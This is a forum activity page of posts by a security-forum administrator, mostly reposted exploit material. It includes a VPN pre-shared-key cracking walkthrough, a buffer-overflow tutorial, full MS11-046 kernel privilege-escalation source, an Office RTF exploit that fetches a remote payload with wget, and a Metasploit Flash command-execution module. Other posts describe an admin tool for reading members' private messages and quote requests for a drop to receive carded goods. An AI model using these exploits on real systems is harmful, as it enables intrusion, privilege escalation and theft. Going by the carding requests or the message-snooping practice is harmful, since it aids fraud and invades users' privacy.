Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18772

  • Joined

  • Last visited

  • Days Won

    730

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=3]Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain[/h] Kislay Bhardwaj - 1:50 AM In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. It looks like this: $ [COLOR=red]sudo ike-scan 192.168.207.134[/COLOR] Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 0 returned handshake; 1 returned notify $ [COLOR=red]sudo ike-scan -A 192.168.207.134[/COLOR] Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) 192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) To save with some output: $ [COLOR=red]sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key[/COLOR] Once you have you psk file to crack you're stuck with two options psk-crack and cain psk-crack is fairly rudamentary to brute force: $[COLOR=red] psk-crack -b 5 192-168-207-134key[/COLOR] Running in brute-force cracking mode Brute force with 36 chars up to length 5 will take up to 60466176 iterations no match found for MD5 hash 5c178d[SNIP] Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= $[COLOR=red] psk-crack -b 5 --[/COLOR]charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key Running in brute-force cracking modde Brute force with 63 chars up to length 5 will take up to 992436543 iterations To dictionary attack: $ [COLOR=red]psk-crack -d /path/to/dictionary 192-168-207-134key[/COLOR] Running in dictionary cracking mode no match found for MD5 hash 5c178d[SNIP] Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack. Sursa: Kislay Bhardwaj: Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
  2. Nytro
    [h=3]Exploit writing: A basic Idea.[/h] Kislay Bhardwaj - 1:59 PM Exploit Writing Made Easier With !pvefindaddr A few notes before we begin, covering what this paper is about and what it isn’t about: 1. This paper is intended to demonstrate the efficiency of !pvefindaddr. 2. This paper will not explain the exploit till the end, if you want the full exploit go here: http:// AOL Desktop 9.6 .rtx Buffer Overflow Now let’s start! Required software: Immunity Debugger !pvefindaddr AOL Desktop v9.6 Required knowledge: Understanding how buffer overflows work. Exploiting techniques. A programming language (I use python). I’ve heard a lot of people complaining about how many apps they must use when writing exploits, or how time consuming some tasks can be if they are not automated or when trying to test multiple dll’s for SAFESEH or ASLR, that’s where !pvefindaddr comes in. What is !pvefindaddr !? Well in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need when building an exploit. Here is some helpful information on how to install !pvefindaddr and some basic usage Ok, let us get started ! Install AOL Desktop v9.6 (A quick note here, if the app doesn’t work properly in Immunity Debugger you will have to close the debugger, issue CTRL+ALT+DELETE -> Processes and stop all AOL related processes then run the app). Now let’s make the exploit skeleton (I won’t remake the full exploit, if you want to check it out it’s on the top of the page), it will contain two standard headers and between them our buffer, let’s check it out: **************************************** #!/usr/bin/python # The First Header hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22" "\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41" "\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22" "\x68\x74\x74\x70\x3a\x2f\x2f") # The Second Header hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52" "\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f" "\x48\x54\x4d\x4c\x3e\x0d\x0a") payload='\x90'* 6000 exploit = hd1+payload+hd2 try: file=open('exploit.rtx','w') file.write(exploit) file.close() print 'File created, time to PEW PEW!\n' except: print 'Something went wrong!\n' print 'Check if you have permisions to write in that folder, of if the folder exists!' **************************************** Generate the file using the exploit and after that open it in AOL Desktop and as we can see we could overwrite EIP with our ‘\x90’’s: So what would be next ? Calculating the exact offset until EIP overwrite. (NOTE: Before we go on, restart AOL and attach it again). In our debugger we can either click on the PyCommands button and select from the list ! pvefindadrr and then enter the arguments or we can do this directly by entering !pvefindaddr and the arguments in the command bar at the bottom of the debugger like this: As you can see it said “check mspattern.txt” so we go in the Immunity Debugger folder and open up mspatters.txt, copy the pattern in our exploit and regenerate the malicious file. After opening the malicious file containing our pattern: We can see that our EIP is 35784734 and we also can see that ESI points in our buffer, now in order to determine the exact offset we will use another feature from !pvefindaddr. Normally with metasploit we would try pattern_offset EIP now, well with !pvefindaddr we can actually get more info, let’s try the findmsp function. After it is done just open the Log Windows and as we can see, we have some nice information: So it found the first characters from the patters in davclnt.dll then it checked register addresses, we have the EIP overwite address beginning at 5384 and the register who points in to the pattern with the instruction CALL DWORD[ESI+10] (if you check) at 5368 it even checked the SEH chains to see if it finds the pattern there and we also have the “Walking stack” which if you haven’t guessed by now it actually tells us when the ESP contains a pointer to our buffer at the position 4360. This is a nice feature but we have one that does even better, !pvefindaddr also has a function that runs a findmsp and after that based on the results and on the stack it acutally gives us information about the type of exploit and how it should be made, let’s check it out. !pvefindaddr suggest Sweet huh ? Now we have the exact offset before the EIP overwrite, we know that ESI points to our buffer the next normal step would be to get the value of ESI into EIP with a JMP ESI, CALL ESI, etc. now these are simple instructions we can find them but what if we want to find these instructions without null bytes, from specific modules, etc. (NOTE: I’m not saying this can’t be done manual, only saying that it will take more time and this way it’s much easier). Let’s say we want to make this exploit using an universal address (like the original exploit), searching for this instruction can take a lot of time, mostly because it’s a very common instruction, but using !pvefindaddr we can actually search for every JMP ESI instruction from some specific modules and some specific chatacteristics. We will use !pvefindaddr to give us a list of all modules and their characteristics, once we have done this we can view all the modules that the app uses and see which have SAFESEH, ASLR, etc.: Once we can see which modules we can use we can start searching for the specific instruction using the command: !pvefindaddr j -r ESI -n -o (this might take some time, go get a beer or something.) This function searches for pointers that jump to a specific register (ESI in our case), the most common use of this function is when dealing with direct EIP overwrite. The function will look for any instructions like JMP ESI, CALL ESI combination from non-fixup and non-aslr modules also the -n flag will not show pointers that contain null bytes and the -o flag will exclude the pointers in the OS modules (We want to make it universal). After a little search we find a nice intruction at 20C5CFC0 from aolusershell.dll, this one should work perfect. After we are done we can also use compare to check in order to compare some bytes (usually our shellcode) from a file with some bytes in memory it also compares unicode expanded instances, ok now we need to make our shellcode binary (only the shellcode), we can just give the RAW output at Metasploit when making a payload and pipe it to a file like: msfpayload windows/exec CMD=calc.exe R > shellcode There is also a nice perl script that shows you how to do it on the !pvefindaddr wiki: **************************************** my $shellcode="\xcc\xcc\xcc\xcc"; #paste your shellcode here open(FILE,">c:\\temp\\shellcode.bin"); binmode FILE; print FILE $shellcode; close(FILE); **************************************** We then run the whole exploit (with the shellcode included, without any breakpoints or anything), now that the app has crashed we compare it: !pve finder compare C:\shellcode After it is finished we can either view the Log Windows or open compare.txt from the Immunity Debugger folder: Now a quick review on what we managed to do in this tutorial: - We have determined the exact offset before EIP gets overwritten and also a register that points to our buffer. - We have found our type of exploit, and some information on how to structure it - Found out which modules have SAFESEH, ASLR or get rebased - Found the instruction we needed avoiding these modules and the OS modules aswell - Checked if our shellcode contains bad characters. So as you can see we did all the above with just !pvefindaddr and we also managed to save a good amount of time. Sursa: Kislay Bhardwaj: Exploit writing: A basic Idea.
  3. Nytro
    Da, frumos...
  4. Nytro
    Informatica @ Universitate: Anul I, semestrul I: - Programare procedurala (limbajul C) - Logica matematica (pula Boole, porcarie) - Algebra (cacat) - Analiza (cacat si mai mare) - Algoritmi si structuri de date (sortari, arbori, util) - Arhitectura calculatorului (cum arata un procesor, interesant, laborator de ASM, util) Anul I, semestrul II: - Programare orientata pe obiecte (C++, important) - Analiza II (cacat) - Algebra II (cacat) - Algoritmica grafurilor (prea teoretic, naspa) - Geometrie (tot cacat) - Limbaje formale si automate (nu prea stiu despre ce e vorba) Anul II, semestrul I: - tehnici web: HTML, CSS si Javascript (practic) - geometrie computationala (cam teoretic, cred) - calculabilitate si complexitate (optimizari, util) - tehnici avansate de programare (java, foarte util) - sisteme de operare (Linux, C++ sub Linux, super tare) - probabilitati (nu stiu exact, cred ca mate, deci naspa) Anul II, semestrul II: - statistica (profa buna, porcarie in rest) - retele de calculatoare (Java sockets, RMI si serializare, util) - metode de dezvoltare software (porcarie la care trebuie orice proiect) - inteligenta artificiala (nu stiu exact, laborator de Prolog) - programare logica (prof naspa, laborator de Maude, un limbaj ciudatel dar interesant) - baze de date (teorie la curs, laborator de Oracle) Cam atat deocamdata, daca vreti alte informatii, cereti.
  5. Nytro
    begood: E ok asa? Acela e ID-ul? Nemessis: Noi avem acces la baza de date, nu cred ca o sa fie probleme. Oricum, majoritatea ne cunoastem intre noi. Sau hai in cacat sa facem si noi un meeting...
  6. Nytro
    SecureCRT.
  7. Nytro
    Scuze, acces: - 3871 = Nytro - 989 = Zatarra - 21017 = pyth0n3 - 13607 = begood - 15061 = MrRip - 1 = []kw3rln - 528 = Nemessis - 1348 = Ahead - 22232 = wildchild - 22968 = tex De asemenea, nu se pot vedea (asa ar trebui) mesajele private ale celor cu acces. Daca mai doreste cineva acces, sa ma contacteze. Daca e vreo problema, sau daca vreti ceva in plus, spuneti.
  8. Nytro
    [h=1]MS11-046 Afd.sys Proof of Concept[/h] /* MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with this exploit . I Rahul Sasi(fb1h2s) just made the POC exploit available . Reference: ms8-66, ms6-49 ************************************************************* Too lazy to add the shellcode , you could steel this one, it should work . http://www.whitecell.org/list.php?id=50 The shell code to acheive privilage esclation as per the article used the following steps http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf . 1) Use PslookupProcessId get system token 2) Replace it with the current process token, and we are system ************************************************************* */ #define SystemModuleInformation 11 #ifndef WIN32_LEAN_AND_MEAN #define WIN32_LEAN_AND_MEAN #endif #ifndef _WIN32_WINNT //For XP Only #define _WIN32_WINNT 0x0501 #endif // We have a client sock conencting to 135 considering the fact it's open by default #define DEFAULT_ADDR "127.0.0.1" #define DEFAULT_PORT "135" #include <windows.h> #include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <iphlpapi.h> #include <stdio.h> #pragma comment(lib, "Ws2_32.lib") #pragma comment (lib, "ntdll.lib") //lets make a nop ret sandwitch unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90"; /* The shell code to acheive privilage esclation Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf the malware used the following method. 1) Wse PslookupProcessId get system token 2) Replace it with the current process token, and we are system */ // he gets the above sandwitch LPVOID hexcode_addr = (LPVOID)0x00000000; DWORD sizeofshell = 0x1000; // he gets the haldispatch ULONG_PTR HalDispatchTable; //Holds the base adress of krnl PVOID krl_base; //load adress of those %krnl%.exe dudes HMODULE krl_addr; // structure system_module_info data typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; //sock addrinfo struct addrinfo *result = NULL, *ptr = NULL, hints; // The list of loaded drivers typedef LONG NTSTATUS, *PNTSTATUS; NTSTATUS NTAPI ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); typedef enum _KPROFILE_SOURCE { ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry, ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions, ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses, ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions, ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue, ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues, ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues, ProfileMaximum } KPROFILE_SOURCE, *PKPROFILE_SOURCE; typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource,PULONG Interval ); typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect ); int main() { //All the declarations goes here PNTQUERYINTERVAL ZwQueryIntervalProfile; PNTALLOCATE ZwAllocateVirtualMemory; KPROFILE_SOURCE stProfile = ProfileTotalIssues; ULONG Ret_size; NTSTATUS status,alloc_status ; ULONG i, n, *q; PSYSTEM_MODULE_INFORMATION p; void *base; WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; int iResult; DWORD ibuf [0x30]; DWORD obuf [0x30]; ULONG_PTR result; hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; printf("\n [+] MS11-046 Exploit by fb1h2s(Rahul Sasi) "); /* MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with the exploit details . I Rahul Sasi(fb1h2s) just made the POC exploit available . Reference: ms8_66, ms6_49 http://www.whitecell.org/list.php?id=50 exp codes */ status = ZwQuerySystemInformation(SystemModuleInformation, &n, 0, &n); q = (ULONG *)malloc(n * sizeof(*q)); if (q == NULL) { perror("malloc"); return -1; } status = ZwQuerySystemInformation(SystemModuleInformation, q, n * sizeof(*q), NULL); p = (PSYSTEM_MODULE_INFORMATION)(q + 1); base = NULL; // Loop Loop The table and check for our krl for (i = 0; i < *q; i++) { if( strstr(p[i].ImageName,"ntkrnlpa.exe") ) { printf("\n [+] Yo Yo found, and am In ntkrnlpa.exe \n"); krl_addr = LoadLibraryExA("ntkrnlpa.exe",0,1); printf("\t Base: 0x%x size: %u\t%s\n", p[i].Base, p[i].Size, p[i].ImageName); krl_base = p[i].Base; break; } else if(strstr(p[i].ImageName,"ntoskrnl.exe")) { printf("\n [+] Yo Yo found, and am In ntoskrnl.exe\n"); krl_addr = LoadLibraryExA("ntoskrnl.exe",0,1); printf("\t Base Adress: 0x%x ",p[i].Base); krl_base = p[i].Base; break; } else { printf("\n [+]Cdnt find, and am out\n"); exit(0); } } free(q); printf("\n[+] Continue with Exploitation\n"); HalDispatchTable = (ULONG_PTR)GetProcAddress(krl_addr, "HalDispatchTable"); if( !HalDispatchTable ) { printf("[!!] Sh*t happen with HalDispatchTablen"); return FALSE; } printf("\tBase Nt=: 0x%x ",krl_base); HalDispatchTable -= ( ULONG_PTR )krl_addr; HalDispatchTable += krl_base; printf("\n[+] HalDispatchTable found \t\t\t [ 0x%p ]\n",HalDispatchTable); printf("[+] ZwQueryIntervalProfile "); ZwQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQueryIntervalProfile"); if( !ZwQueryIntervalProfile ) { printf("[!!] Sh*t happen resolving ZwQueryIntervalProfile\n"); return FALSE; } printf( "\t\t\t [ 0x%p ]\n",ZwQueryIntervalProfile ); printf("[+] ZwAllocateVirtualMemory"); ZwAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle( "ntdll.dll"), "ZwAllocateVirtualMemory"); if( !ZwAllocateVirtualMemory ) { printf("[!!] Unable to resolve ZwAllocateVirtualMemory\n"); return FALSE; } printf( "\t\t\t [ 0x%p ]\n",ZwAllocateVirtualMemory ); printf("\n[+] Allocating memory at [ 0x%p ]...\n",hexcode_addr); alloc_status = ZwAllocateVirtualMemory( INVALID_HANDLE_VALUE, &hexcode_addr, 0, &sizeofshell, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); printf("\n[+] status %p.\n",alloc_status ); if( alloc_status != 0 ) { printf("[-] Sh*t happen with NtAllocateVirtualMemory() , %#X\n", alloc_status); } printf("\t\tZwAllocateVirtualMemory() Allocated return Status, %#X\n", alloc_status); memset(hexcode_addr, 0x90, sizeofshell); memcpy( (void*)((BYTE*)hexcode_addr + 0x100),(void*)hexcode, sizeof(hexcode)); iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != 0) { printf("WASUP Failed: %d\n", iResult); return 1; } iResult = getaddrinfo(DEFAULT_ADDR, DEFAULT_PORT, &hints, &result); ptr=result; // SOCKET for connecting to localhost at 135 ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); if (ConnectSocket == INVALID_SOCKET) { printf("[-] This is bad , Socket Error : %ld\n", WSAGetLastError()); freeaddrinfo(result); WSACleanup(); return 1; } // Connect to server. iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); if (iResult == SOCKET_ERROR) { closesocket(ConnectSocket); ConnectSocket = INVALID_SOCKET; printf("[+]Unable to connect to server, modify code and add a server socket, and connect to it!\n"); WSACleanup(); return ; } else { printf("[+]Hola Connected to server !\n"); } memset(ibuf,0x90,sizeof(ibuf)); memset(obuf,0x90,sizeof(obuf)); DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)obuf,0, &Ret_size, NULL); for( i = 0; i < sizeof( hints ) ; i++) { printf(" %02X ",(unsigned char)obuf[i]); } printf("\n\n[+] Overwriting HalDispatchTable with those bytes..."); DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)HalDispatchTable,0, &Ret_size, NULL); printf("\n\n[+] This should work and break..."); ZwQueryIntervalProfile(stProfile,&result); } Sursa: MS11-046 Afd.sys Proof of Concept
  9. Nytro
    [h=1]Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service[/h] Source: http://www.securityfocus.com/bid/52735/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. The following Wireshark versions are vulnerable: 1.4.0 through 1.4.11 1.6.0 through 1.6.5 PoC: http://www.exploit-db.com/sploits/18758.pcap Sursa: Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service
  10. Nytro
    [h=1]Office 2008 sp0 RTF Pfragments MAC exploit[/h] #RTF Pfragments exploit for MAC office 2008 #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Office 2007 for MC SP 0 #!/usr/bin/python myfile = ( "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b" "\x5c\x73\x6e\x20\x70\x46\x72\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b" "\x5c\x73\x76\x20\x39\x3b\x32\x3b\x31\x31\x31\x31\x31\x31\x31\x31" "\x37\x35\x30\x30\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "f069837c" # call esp "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x62\x61\x30\x30" "\x30\x30\x35\x30\x30\x30\x36\x36\x38\x31\x63\x61\x66\x66\x30\x66" "\x34\x32\x35\x32\x36\x61\x30\x32\x35\x38\x63\x64\x32\x65\x33\x63" "\x30\x35\x35\x61\x37\x34\x65\x66\x62\x38\x37\x30\x36\x39\x36\x65" "\x36\x37\x38\x62\x66\x61\x61\x66\x37\x35\x65\x61\x61\x66\x37\x35" "\x65\x37\x35\x37\x63\x33\x7d\x7d\x7d\x7d" ) sign = ( "\x70\x69\x6e\x67\x70\x69\x6e\x67" ) shellcode = "\xCC\xCC\xCC\xCC" shellcode += "http://www.site.com/payload.DMG" shellcode += "\x11\x3A\x65\x89\x11\x3A\x65\x89\x11\x3A\x65\x89" #("wget http://") shellcode += "wget " shellcode += "\x1A\x18\x19\x02" exploit = open("output.doc", mode="wb") exploit.write(myfile + sign + shellcode) print "Done" Sursa: Office 2008 sp0 RTF Pfragments MAC exploit
  11. Nytro
    [h=1]Adobe Flash Player ActionScript Launch Command Execution Vulnerability[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability', 'Description' => %q{ This module exploits a vulnerability in Adobe Flash Player for Linux, version 10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows command execution when the browser loads a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. The victim must have Adobe AIR installed for the exploit to work. This module was tested against version 10.0.12.36 (10r12_36). }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version ], 'References' => [ ['CVE', '2008-5499'], ['OSVDB', '50796'], ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], ['URL', 'http://www.securityfocus.com/bid/32896/exploit'] ], 'DefaultOptions' => { 'HTTP::compression' => 'gzip', 'HTTP::chunked' => true }, 'Platform' => 'unix', # so unix cmd exec payloads are ok 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Automatic', {}], ], 'DisclosureDate' => 'Dec 17 2008', 'DefaultTarget' => 0)) end def exploit path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" ) fd = File.open( path, "rb" ) @swf = fd.read(fd.stat.size) fd.close super end def on_request_uri(cli, request) msg = "#{cli.peerhost.ljust(16)} #{self.shortname}" trigger = @swf trigger_file = rand_text_alpha(rand(6)+3) + ".swf" obj_id = rand_text_alpha(rand(6)+3) if request.uri.match(/\.swf/i) print_status("#{msg} Sending Exploit SWF") send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' }) return end if request.uri.match(/\.txt/i) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) return end html = <<-EOS <html> <head> </head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="#{get_resource}#{trigger_file}" /> <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> </embed> </object> </center> </body> </html> EOS print_status("#{msg} Sending HTML...") send_response(cli, html, { 'Content-Type' => 'text/html' }) end end Sursa: Adobe Flash Player ActionScript Launch Command Execution Vulnerability
  12. Nytro
    Bla bla bla. Vreau sa vad acea poza. Asta ca sa nu va dau ban la amandoi.
  13. Nytro
    Salut, Am facut o prima versiune a aplicatiei de citit mesajele private. Stiu ca arata ca pula, dar e oarecum functional, putin limitat momentan. Limitari: - arata ca dracu - codul nu e scris tocmai profesional - implicit, afiseaza doar ultimele 30 de mesaje private - nu are niciun fel de paginare - intoarce doar ultimele 100 (LIMIT) de rezultate (DESC) ale cautarilor - nu are protectii de CSRF (lene) si SQL Injection (sa nu fie probleme cu cautarile) - daca mesajul e trimis catre mai multe persoane, nu le afiseaza O sa mai lucrez la el, poate maine sau in curand, e 4:43 AM acum. Momentau au acces doar: - 3871 = Nytro - 989 = Zatarra - 21017 = pyth0n3 - 13607 = begood - 15061 = MrRip - 1 = []kw3rln Daca mai doreste cineva acces, sa ma contacteze. Sa imi spuneti de eventuale probleme. Link: https://rstcenter.com/linkeditat Bafta.
  14. Nytro
    JavaScript Deobfuscation A Manual Approach Sudeep Singh 4/15/2012 Table of Contents Preface .......................................................................................................................................................... 3 Reasons for JavaScript Obfuscation .............................................................................................................. 4 Javascript Minifiers vs Obfuscators ............................................................................................................... 4 Methods of JavaScript Obfuscation .............................................................................................................. 5 Basic JavaScript Obfuscation ......................................................................................................................... 6 Blackhole Exploit Kit .................................................................................................................................... 12 Breaking Point Obfuscated JS Challenge ..................................................................................................... 23 JS Obfuscation in MetaSploit Framework ................................................................................................... 34 Conclusion ................................................................................................................................................... 37 References .................................................................................................................................................. 37 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18746.pdf
  15. Nytro
    Bun, tinem la seed.
  16. Nytro
    https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/
  17. Nytro

    RST Market

    Nytro replied to a topic in Anunturi importante

    Nu stiu ce ati scris mai sus, dar la RST market, neaprobate: dxbut Am nevoie de un drop (pers ce primeste un colet cu produse cardate).Discutam. ------------------------------------------------------------------------ napoletanii Cumpar Virtual Credit Card cu 50 usd pe el de preferat sa fie visa si sa pot primi plati pe el. Platesc LR estimativ: pentru un vcc cu balance de 50 usd platesc 68 usd Am incercat 2 siteuri din multitudinea de "culori" de pe google (neavand timp sa ma informez daca chiar sunt sigure site-urile) https://www.instantvirtualcreditcards.com am primit cartea instant dar cartile vin cu sume mici (intre 5/10 usd) Buy VCC(Virtual Credit Card) Paypal VCC | Facebook VCC | ebay VCC | Facebook Coupons |and Virtual Credit Card for Online Purchase e un site nou facut in ianuarie si l-am incercat , e in pending tranzactia de 2 zile;) drept urmare am ajuns la varianta asta
  18. Nytro
    Sfinte cacat, voi sunteti batuti in cap. Ba 2 dolari pe zi, ba 5 dolari pe saptamana... Ce cacat faceti cu "banii" astia? Angajati-va ca spalatori de parbrize, tiganusii aia castiga 25-30 de RON pe zi, adica 10 dolari pe zi, adica se pisa pe voi milogilor. Bani din click-uri? Altceva nu puteti face? Asta e tot ce va ofera materia cenusie, sa dati clickuri? Faceti in cacat niste proiecte, 2-3 gratis, apoi 2-3 mai ieftine, apoi ies bani, se aduna lucruri pe CV, va angajati si luati 1500 - 2000 RON ca prim salariu, adica mai mult de 2 dolari pe zi.
  19. Nytro
    [h=1]GoingNative 6: Walter Bright and Andrei Alexandrescu - D Programming Language[/h] Posted: Feb 21, 2012 at 4:21 PM By: Charles We're back! Sorry for the delay between episodes, but we were busy preparing and then putting on GoingNative 2012, a C++11 conference that you have hopefully heard about It was a blast! Such great speakers. Such great attendees. Huge thanks to all of you who made the journey to Redmond for two days, bringing with you so much IQ and C++ love. And to those who watched the show live online, thank you, too, of course! All sessions will always be available on-demand right here on C9. Watch at your leisure, but do watch/listen/learn! We were fortunate and honored to have Andrei Alexandrescu speaking and Walter Bright in attendance at GoingNative 2012. Walter and Andrei are the co-custodians of the D programming language. Walter invented D about 11 or 12 years ago. Andrei has been an unrelenting champion and contributor to D for a long time and is the author of the book The D Programming Language. When/why did Andrei get involved with D? We'll find out. We filmed a conversation with these two legends right after GoingNative 2012 ended. So, what is D? What makes it special? D is a modern native programming language (not really an evolution of C++ as the name might imply. C++11 is an evolution of C++... D is it's own thing. It's D.). D is imperative (with C-like syntax), statically-typed, object-oriented, dynamic-friendly (via static type inference), garbage collected (optional), shared-nothing by default (nice!), functional-friendly (you can write pure functions that are verifiably pure), polymorphic, generic, and COM-friendly, too. D is also a low-level systems programming language. D takes many powerful modern programming ideas and idioms and makes them easy to use while keeping things purely native. We love this! Too often we hear things like, "Well, if you go fully native then you loose productivity..." Whatever. D proves you can have your cake and eat it, too. Tune in. Meet Walter and Andrei (and D, if you're not familiar with it). Thanks 